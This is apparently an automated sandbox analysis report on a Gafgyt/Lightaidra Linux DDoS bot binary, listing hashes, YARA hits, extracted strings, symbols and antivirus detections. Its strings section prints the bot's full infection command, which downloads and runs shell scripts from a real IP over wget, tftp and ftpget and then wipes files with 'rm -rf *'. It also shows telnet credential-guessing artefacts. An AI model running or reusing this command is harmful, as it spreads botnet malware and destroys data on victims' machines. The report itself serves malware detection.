Report #768

(1)

Binary

ABI ELFOSABI_SYSV

Size 73.81KB

Type ET_EXEC

trid 50.1% ELF Executable and Linkable format

49.8% ELF Executable and Linkable format

type ELF

Wordsize 32

Architecture x86

Hashes

md5 08c3bf87ff0a26ac3e65f10ff1516655

sha1 6c6f425b13c6af72870d55c56574f00421d4e3fa

crc32 0x391a74f7

sha224 fdd8ee63366209b306a2414b070bf995c6ed84777139559cd682efa5

sha256 0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284 c8f

sha384 bee304b66f5f99cc1b164a88ad86c467c3929b2b9d6efc625efae4459e620e e16f3098bba81560b80ab9f10bacfa1022

sha512 2c3bed47ea246e930bbf8a6b45b4e47d3586ae2a77d16640e6fc288695714 b8a02fe55937d501960fe852b85b7025ea019b993c36ec0613d01eab8f447 b26a6d

ssdeep 1536:xyq93lguLYiPvoVjRWSbXJ0rWlC/kPstVkYFWw23fQW83LZ5:p3KwYiPvoV jRWSbLQ/kPstVkjw2IN

Community

Report #768

Creation Date: Oct. 19, 2019, 5:05 p.m.

Last Update: Oct. 19, 2019, 5:05 p.m.

File:

0a87649048685b881f1ec96cc1ed9f2d9e6629e62bb0337b39633da9e3284c8f Results:

(2)

Google False

HashLib False

YARA

Matches maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf

Suspicious True

Dwarf

List

Number 0

Files

Sys Home

Proc /proc/cpuinfo, /proc/net/route

Password

Flags

Flags 0

Packer

List None

Packed False

Network

IPs cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.238.165.7 6/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 104.238.165.76 -c get tftp1.s h; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.238.165.76; chmo d 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104

(3)

.238.165.76 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.s h; rm -rf *; exit, 104.238.165.76:23

URLs cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.238.165.7 6/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 104.238.165.76 -c get tftp1.s h; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.238.165.76; chmo d 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104 .238.165.76 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.s h; rm -rf *; exit

Mails

Strings

List

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.238.165.76/bins.sh; chmod 777 bins.sh; sh bins.s h; tftp 104.238.165.76 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.238.165.76; chmod 7 77 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.238.165.76 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit

104.238.165.76:23 .got.plt

Network is down

Machine is not on the network No route to host

Host is down

been_there_done_that.3001 been_there_done_that _fwrite.c

open.c write.c

Transport endpoint is not connected No such process

Block device required Remote address changed No such device or address Operation now in progress Is a named type file Connection reset by peer Too many links

Too many open files Link has been severed Object is remote

Too many open files in system No such device

REPORT %s:%s:%s

.lib section in a.out corrupted

Cannot send after transport endpoint shutdown Operation not permitted

My IP: %s Invalid flag "%s"

8.8.8.8 BUILD %s BUILD %s

(4)

Too many users __GI_execl

__GI_fflush_unlocked PONG!

__libc_nanosleep __GI_sleep __socketcall __GI_execve

__register_frame_info_bases __GI_pipe

_Jv_RegisterClasses

__deregister_frame_info_bases fflush_unlocked.c

__GI_nanosleep nanosleep.c __socketcall.c fflush_unlocked socket.c __GI_socket sleep.c sendHTTP tcpcsum PONG HTTP

commServer pipe.c

Software caused connection abort Socket operation on non-socket inet_addr

currentServer Identifier removed

Interrupted system call should be restarted Operation already in progress

Address family not supported by protocol Too many references: cannot splice makeIPPacket

usernames

Transport endpoint is already connected KILLATTK

random_poly_info random.c

random_r changeme

Permission denied nanosleep

srandom_r __GI_random_r password sendTCP

Too many levels of symbolic links Can not access a needed shared library fwrite_unlocked

Not a XENIX named type file processCmd

random_r.c Exec format error __GI_srandom_r

Protocol driver not attached passwords

(5)

Attempting to link in too many shared libraries getHost

Network dropped connection on reset __GI_random

vfprintf

Name not unique on network

Symbols

List libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __E H_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtor s_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END_

_, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysd eps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, client.c, c, Q, i.4252, pr intchar, prints, printi, print, fdopen_pids, hextable, ipState, libc/sysdeps/linu x/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, chdir.c, close.c, dup2.c, fork.c, getdtablesize.c, getpid.c, getrlimit.c, ioctl.c, kill.c, open.c, pi pe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, writ e.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_locati on.c, printf.c, popen.c, mylock, popen_list, _stdio.c, _stdio_streams, __stdio_

mutex_initializer.4160, _fixed_buffers, _wcommit.c, vfprintf.c, _vfprintf_inter nal.c, _charpad, _fp_out_narrow, spec_base.4370, prefix.4371, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type _codes, type_sizes, spec_flags.4372, qual_chars.4377, spec_chars.4373, sp ec_ranges.4374, spec_or_mask.4375, spec_and_mask.4376, fputs_unlocked .c, fwrite_unlocked.c, memcpy.c, memset.c, strcat.c, strchr.c, strcpy.c, strlen .c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unkno wn.1330, _string_syserrmsgs.c, strtok.c, next_start.1278, isatty.c, tcgetattr.

c, ntohl.c, inet_ntoa.c, buf.2827, inet_makeaddr.c, connect.c, getsockname.

c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c , sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, m ylock, unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c , strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c , __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_d one_that.3001, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sys deps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getre s.c, execve.c, getegid.c, geteuid.c, getgid.c, getpagesize.c, getuid.c, munm ap.c, nanosleep.c, sbrk.c, wait4.c, errno.c, wcrtomb.c, wcsrtombs.c, wcsnrt ombs.c, fclose.c, fdopen.c, _WRITE.c, _fopen.c, _fwrite.c, _trans2w.c, _load_i nttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, fflush_unlocked.c, memchr.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, i net_aton.c, raise.c, dl-support.c, brk.c, fseeko.c, fseeko64.c, _adjust_pos.c, _cs_funcs.c, rawmemchr.c, strspn.c, llseek.c, __fini_array_end, __fini_array_s tart, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init _array_start, __preinit_array_start, __GI_execve, __libc_sigaction, strcpy, __G I_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_mem chr, __GI___glibc_strerror_r, waitpid, getrlimit, ioctl, _stdio_openlist_use_cou nt, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, _ _GI_time, getgid, popen, sysconf, printf, stdout, random, __GI_getpagesize, getdtablesize, __GI_h_errno, __GI___ctype_toupper, recv, connect, __GI___uC libc_fini, numpids, sigemptyset, __pthread_mutex_lock, initConnection, __si gdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, __GI_setsid, sen dTCP, pclose, __bsd_signal, __GI_strpbrk, munmap, __GI_setsockopt, __libc_s tack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, __libc_fc ntl, atol, _h_errno, getRandomPublicIP, __ctype_b, __GI_random_r, usernam

(6)

es, errno, getegid, __GI_sbrk, zprintf, __GI___uClibc_init, execve, getpagesiz e, getpid, __GI_lseek64, setstate_r, getHost, __libc_getpid, wildString, __xpg _strerror_r, fcntl64, prctl, memcpy, makeRandomStr, getRandomIP, __GI_fp uts_unlocked, execl, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __lib c_select, _ppfs_init, __GI___C_ctype_toupper, __libc_nanosleep, trim, dup2, _ _pthread_mutex_init, getuid, system, malloc, isatty, sleep, __GI_atol, __GI_r ead, random_r, __dso_handle, clock_getres, tcpcsum, fdpclose, socket, __GI _dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fc ntl, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_write, __ctype_tou pper, __libc_read, _string_syserrmsgs, __GI_open, __GI_strchr, sigaddset, __

GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, sockprintf, __GI _inet_ntoa, send, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, _ _GI_getgid, srandom_r, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, st rtol, pipe, __libc_lseek64, strnlen, rawmemchr, __GI_mempcpy, __malloc_sta te, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, __pt hread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_f ini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, write, environ, __GI_c lose, getBuild, kill, fputs_unlocked, __pthread_mutex_trylock, strcat, __GI_br k, __GI_strcat, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmas k, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_cou nt, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, setstat e, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, __stdin, s tdin, __GI_isatty, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, ini t_rand, rand, signal, read, getCores, __GI_memcpy, wcsrtombs, _stdio_user_

locking, strncpy, htonl, sendto, __C_ctype_toupper, StartTheLelz, __GI___C_c type_b, __GI_strncpy, __libc_send, __GI___xpg_strerror_r, currentServer, __GI _getrlimit, __GI_strcpy, strtok, __stdio_adjust_position, malloc_trim, fdopen, _vfprintf_internal, fork, gotIP, __GI_sleep, sigaction, _dl_phdr, __GI___libc_fcn tl64, __uClibc_init, __GI_munmap, _store_inttype, __getpagesize, __GI_rando m, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_l ock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, __libc_close, __GI_getpid, ine t_aton, index, _pthread_cleanup_push_defer, processCmd, __sigismember, _ _bss_start, __libc_open, getOurIP, memset, __GI_socket, main, __glibc_strerr or_r, listFork, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_s igaction, ntohs, sendUDP, inet_ntoa, tcgetattr, time, __libc_system, __GI_ab ort, fdpopen, __stdio_init_mutex, __GI__exit, data_start, __GI_sysconf, __h_er rno_location, matchPrompt, __C_ctype_b_data, _stdio_fopen, _fini, __GI_chdi r, __vfork, __GI_mmap, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __

libc_waitpid, __GI_waitpid, _stdio_term, __GI_vfprintf, __GI_signal, stderr, co mmServer, vfork, __C_ctype_b, srandom, _ppfs_setargs, __GI_sendto, __GI_s igemptyset, __GI_printf, __libc_fork, __atexit_lock, scanPid, rand_cmwc, __lib c_fcntl64, getsockopt, __GI_fseeko64, fflush_unlocked, __stdio_wcommit, fw rite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdt ablesize, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, initstate_r, __GI_connect, __curbrk, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strt o_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, brk, __C _ctype_toupper_data, _dl_aux_init, sendJUNK, _errno, atoi, _stdio_openlist_d el_lock, __GI_inet_aton, _exit, szprintf, strspn, __libc_recv, __libc_creat, strle n, lseek64, open, toupper, __libc_write, __malloc_consolidate, _ppfs_parses pec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdi o_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, setsid, __GI_inet_addr, __GI_strnlen, _Jv_RegisterClasses, infectline, macAdd ress, __GI___errno_location, readUntil, fcntl, __GI_fdopen, __GI_atoi, fseeko6 4, wcrtomb, __GI_getsockname, close, __libc_connect, passwords, __GI_strle n, sendHOLD, mainCommSock, pids, sendCNC, vfprintf, strpbrk, getBogos, _load_inttype, raise, free, sigprocmask, getsockname

Number 624

(7)

Reason None

Suspicious False

Version

Version EV_CURRENT

Foremost

Matches None

Sections

List , .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, . comment, .shstrtab, .symtab, .strtab

Number 16

Segments

Number 3

Compilers

List GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2,

(8)

GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2, GCC: (GNU) 4.1.2

Identified 133

Functions

List , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , libc/sysdeps/linux/i386/crti.S, , crts tuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIS T__, , completed.2429, , p.2427, , __do_global_dtors_aux, , object.2482, , fr ame_dummy, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END __, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , libc/sysdeps/linux/i3 86/crtn.S, , libc/sysdeps/linux/i386/crt1.S, , client.c, , c, , Q, , i.4252, , printc har, , prints, , printi, , print, , fdopen_pids, , hextable, , ipState, , libc/sysdep s/linux/i386/vfork.S, , __syscall_fcntl.c, , __syscall_fcntl64.c, , _exit.c, , chdir.

c, , close.c, , dup2.c, , fork.c, , getdtablesize.c, , getpid.c, , getrlimit.c, , ioctl .c, , kill.c, , open.c, , pipe.c, , prctl.c, , read.c, , select.c, , setsid.c, , sigproc mask.c, , time.c, , waitpid.c, , write.c, , isspace.c, , toupper.c, , __C_ctype_b.

c, , __C_ctype_toupper.c, , __errno_location.c, , printf.c, , popen.c, , mylock, , popen_list, , _stdio.c, , _stdio_streams, , __stdio_mutex_initializer.4160, , _fix ed_buffers, , _wcommit.c, , vfprintf.c, , _vfprintf_internal.c, , _charpad, , _fp_

out_narrow, , spec_base.4370, , prefix.4371, , _ppfs_init.c, , _ppfs_prepargs.

c, , _ppfs_setargs.c, , _ppfs_parsespec.c, , _promoted_size, , type_codes, , t ype_sizes, , spec_flags.4372, , qual_chars.4377, , spec_chars.4373, , spec_r anges.4374, , spec_or_mask.4375, , spec_and_mask.4376, , fputs_unlocked .c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strcat.c, , strchr.c, , strcpy.

c, , strlen.c, , strncpy.c, , strnlen.c, , strstr.c, , __glibc_strerror_r.c, , __xpg_str error_r.c, , unknown.1330, , _string_syserrmsgs.c, , strtok.c, , next_start.127 8, , isatty.c, , tcgetattr.c, , ntohl.c, , inet_ntoa.c, , buf.2827, , inet_makeaddr.

c, , connect.c, , getsockname.c, , getsockopt.c, , recv.c, , send.c, , sendto.c, , setsockopt.c, , socket.c, , sigaddset.c, , sigempty.c, , signal.c, , sigsetops.c , , malloc.c, , __malloc_largebin_index, , free.c, , __malloc_trim, , abort.c, , m ylock, , been_there_done_that, , rand.c, , random.c, , mylock, , unsafe_state , , randtbl, , random_r.c, , random_poly_info, , system.c, , atol.c, , strtol.c, , _ stdlib_strto_l.c, , exit.c, , execl.c, , sleep.c, , sysconf.c, , __uClibc_main.c, , __

pthread_return_0, , __pthread_return_void, , __check_one_fd, , been_there_d one_that.3001, , sigaction.c, , __restore_rt, , __restore, , __syscall_error.c, , li bc/sysdeps/linux/i386/mmap.S, , __socketcall.c, , __syscall_rt_sigaction.c, , c lock_getres.c, , execve.c, , getegid.c, , geteuid.c, , getgid.c, , getpagesize.c, , getuid.c, , munmap.c, , nanosleep.c, , sbrk.c, , wait4.c, , errno.c, , wcrtom b.c, , wcsrtombs.c, , wcsnrtombs.c, , fclose.c, , fdopen.c, , _WRITE.c, , _fope

(9)

n.c, , _fwrite.c, , _trans2w.c, , _load_inttype.c, , _store_inttype.c, , _uintmaxt ostr.c, , _fpmaxtostr.c, , fmt, , exp10_table, , fflush_unlocked.c, , memchr.c, , mempcpy.c, , memrchr.c, , strtok_r.c, , strpbrk.c, , inet_aton.c, , raise.c, , dl -support.c, , brk.c, , fseeko.c, , fseeko64.c, , _adjust_pos.c, , _cs_funcs.c, , ra wmemchr.c, , strspn.c, , llseek.c, , __fini_array_end, , __fini_array_start, , __i nit_array_end, , __preinit_array_end, , _GLOBAL_OFFSET_TABLE_, , __init_arr ay_start, , __preinit_array_start, , __GI_execve, , __libc_sigaction, , strcpy, , _ _GI_fcntl64, , recvLine, , __GI_sigaddset, , __socketcall, , __GI___ctype_b, , __

GI_memchr, , __GI___glibc_strerror_r, , waitpid, , getrlimit, , ioctl, , _stdio_op enlist_use_count, , __GI_initstate_r, , __GI_sigaction, , strtok_r, , __GI___C_ct ype_toupper_data, , __GI_time, , getgid, , popen, , sysconf, , printf, , stdout, , random, , __GI_getpagesize, , getdtablesize, , __GI_h_errno, , __GI___ctype _toupper, , recv, , connect, , __GI___uClibc_fini, , numpids, , sigemptyset, , _ _pthread_mutex_lock, , initConnection, , __sigdelset, , __GI_clock_getres, , _ _uClibc_fini, , memrchr, , geteuid, , __GI_setsid, , sendTCP, , pclose, , __bsd_

signal, , __GI_strpbrk, , munmap, , __GI_setsockopt, , __libc_stack_end, , __G I_fclose, , __GI_wcsnrtombs, , __GI_pipe, , _uintmaxtostr, , __libc_fcntl, , atol, , _h_errno, , getRandomPublicIP, , __ctype_b, , __GI_random_r, , usernames, , errno, , getegid, , __GI_sbrk, , zprintf, , __GI___uClibc_init, , execve, , getpa gesize, , getpid, , __GI_lseek64, , setstate_r, , getHost, , __libc_getpid, , wild String, , __xpg_strerror_r, , fcntl64, , prctl, , memcpy, , makeRandomStr, , g etRandomIP, , __GI_fputs_unlocked, , execl, , sendHTTP, , creat, , _stdio_ope nlist_dec_use, , sclose, , __libc_select, , _ppfs_init, , __GI___C_ctype_toupper, , __libc_nanosleep, , trim, , dup2, , __pthread_mutex_init, , getuid, , system, , malloc, , isatty, , sleep, , __GI_atol, , __GI_read, , random_r, , __dso_handle, , clock_getres, , tcpcsum, , fdpclose, , socket, , __GI_dup2, , select, , _pthrea d_cleanup_pop_restore, , __GI_wcrtomb, , __GI___libc_fcntl, , __GI_memset, , isspace, , __stdio_seek, , mempcpy, , __GI_write, , __ctype_toupper, , __libc_

read, , _string_syserrmsgs, , __GI_open, , __GI_strchr, , sigaddset, , __GI_tcg etattr, , __environ, , mmap, , wcsnrtombs, , makeIPPacket, , sockprintf, , __G I_inet_ntoa, , send, , abort, , __GI_fcntl, , __GI_wcsrtombs, , __GI_fwrite_unlo cked, , __GI_getgid, , srandom_r, , _init, , __GI_inet_ntoa_r, , __GI_setstate_r, , parseHex, , strtol, , pipe, , __libc_lseek64, , strnlen, , rawmemchr, , __GI_m empcpy, , __malloc_state, , __GI___C_ctype_b_data, , __sigaddset, , nanosle ep, , __GI_send, , h_errno, , __pthread_mutex_unlock, , wait4, , __register_fr ame_info_bases, , __GI_exit, , __app_fini, , csum, , __exit_cleanup, , __GI_exe cl, , __GI_srandom_r, , write, , environ, , __GI_close, , getBuild, , kill, , fputs_

unlocked, , __pthread_mutex_trylock, , strcat, , __GI_brk, , __GI_strcat, , __GI _nanosleep, , __GI_strtok, , _stdio_openlist, , __GI_sigprocmask, , inet_addr, , ntohl, , __GI_fseek, , ourIP, , chdir, , fseeko, , _stdio_openlist_del_count, , c onnectTimeout, , __raise, , setsockopt, , bsd_signal, , fseek, , __GI_kill, , sets tate, , memchr, , __GI_toupper, , __pthread_initialize_minimal, , __GI_recv, , __stdin, , stdin, , __GI_isatty, , _start, , __deregister_frame_info_bases, , strst r, , __GI_ioctl, , init_rand, , rand, , signal, , read, , getCores, , __GI_memcpy, , wcsrtombs, , _stdio_user_locking, , strncpy, , htonl, , sendto, , __C_ctype_t oupper, , StartTheLelz, , __GI___C_ctype_b, , __GI_strncpy, , __libc_send, , __

GI___xpg_strerror_r, , currentServer, , __GI_getrlimit, , __GI_strcpy, , strtok, , __stdio_adjust_position, , malloc_trim, , fdopen, , _vfprintf_internal, , fork, , gotIP, , __GI_sleep, , sigaction, , _dl_phdr, , __GI___libc_fcntl64, , __uClibc_ini t, , __GI_munmap, , _store_inttype, , __getpagesize, , __GI_random, , __sysc all_error, , __uclibc_progname, , __GI_getegid, , __GI_wait4, , __malloc_lock, , __uClibc_main, , sbrk, , __rtld_fini, , __GI_fork, , __libc_close, , __GI_getpid, , inet_aton, , index, , _pthread_cleanup_push_defer, , processCmd, , __sigism ember, , __bss_start, , __libc_open, , getOurIP, , memset, , __GI_socket, , ma in, , __glibc_strerror_r, , listFork, , __stdio_fwrite, , negotiate, , srand, , initsta te, , fclose, , __syscall_rt_sigaction, , ntohs, , sendUDP, , inet_ntoa, , tcgetat tr, , time, , __libc_system, , __GI_abort, , fdpopen, , __stdio_init_mutex, , __G I__exit, , data_start, , __GI_sysconf, , __h_errno_location, , matchPrompt, , __

C_ctype_b_data, , _stdio_fopen, , _fini, , __GI_chdir, , __vfork, , __GI_mmap, ,

(10)

fdgets, , __get_pc_thunk_bx, , strerror_r, , __GI_select, , __libc_waitpid, , __GI _waitpid, , _stdio_term, , __GI_vfprintf, , __GI_signal, , stderr, , commServer, , vfork, , __C_ctype_b, , srandom, , _ppfs_setargs, , __GI_sendto, , __GI_sige mptyset, , __GI_printf, , __libc_fork, , __atexit_lock, , scanPid, , rand_cmwc, , __libc_fcntl64, , getsockopt, , __GI_fseeko64, , fflush_unlocked, , __stdio_wco mmit, , fwrite_unlocked, , inet_ntoa_r, , __pagesize, , _stdio_openlist_add_lo ck, , __GI_getdtablesize, , _edata, , __stdout, , __GI_memrchr, , __GI_fflush_u nlocked, , __GI_strstr, , _end, , htons, , _sigintr, , _ppfs_prepargs, , __GI_strs pn, , initstate_r, , __GI_connect, , __curbrk, , _dl_phnum, , _fpmaxtostr, , __er rno_location, , uppercase, , _stdlib_strto_l, , __GI___libc_open, , exit, , __stdio _WRITE, , _stdio_init, , __GI_geteuid, , brk, , __C_ctype_toupper_data, , _dl_a ux_init, , sendJUNK, , _errno, , atoi, , _stdio_openlist_del_lock, , __GI_inet_ato n, , _exit, , szprintf, , strspn, , __libc_recv, , __libc_creat, , strlen, , lseek64, , open, , toupper, , __libc_write, , __malloc_consolidate, , _ppfs_parsespec, , _ _GI_strtol, , __GI_getuid, , __GI_strtok_r, , __GI_errno, , __libc_sendto, , __stdi o_trans2w_o, , __GI_vfork, , strchr, , __GI_rawmemchr, , __GI_raise, , __data_

start, , setsid, , __GI_inet_addr, , __GI_strnlen, , _Jv_RegisterClasses, , infectli ne, , macAddress, , __GI___errno_location, , readUntil, , fcntl, , __GI_fdopen, , __GI_atoi, , fseeko64, , wcrtomb, , __GI_getsockname, , close, , __libc_conn ect, , passwords, , __GI_strlen, , sendHOLD, , mainCommSock, , pids, , send CNC, , vfprintf, , strpbrk, , getBogos, , _load_inttype, , raise, , free, , sigproc mask, , getsockname,

Present True

Anti-Debug

Ptrace False

Anti-disasm False

Entry Point

Address 0x8048168

Embedded ELF

List None

Identified 0

Program Header

Size 32

Number 3

Offset 52

(11)

Section Header

Size 40

Number 16

Offset 57640

AVclass

gafgyt 1

VirusTotal

md5 08c3bf87ff0a26ac3e65f10ff1516655

sha1 6c6f425b13c6af72870d55c56574f00421d4e3fa

SCANS (DETECTION RATE = 62.71%)

AVG result: ELF:DDoS-Y [Trj]

update: 20170807 version: 8.0.1489.320 detected: True

CMC update: 20170805

version: 1.1.0.977 detected: False

MAX result: malware (ai score=80)

Bkav update: 20170807

K7GW update: 20170807

version: 10.20.24212 detected: False

ALYac result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807

version: 1.1.1.2 detected: True

(12)

Avast result: ELF:DDoS-Y [Trj]

Avira result: DDOS/LNX.Lightaidra.ljbci

Baidu update: 20170807

Cyren result: ELF/Backdoor.UFDH-

DrWeb result: Linux.BackDoor.Fgt.373

GData result: Gen:Variant.Backdoor.Linux.Gafgyt.1 update: 20170807

version: A:25.13734B:25.10170 detected: True

Panda update: 20170807

VBA32 update: 20170803

VIPRE update: 20170807

version: 60118 detected: False

Zoner update: 20170807

version: 1.0 detected: False

(13)

AVware update: 20170807 version: 1.5.0.42 detected: False

ClamAV result: Unix.Trojan.Gafgyt-111

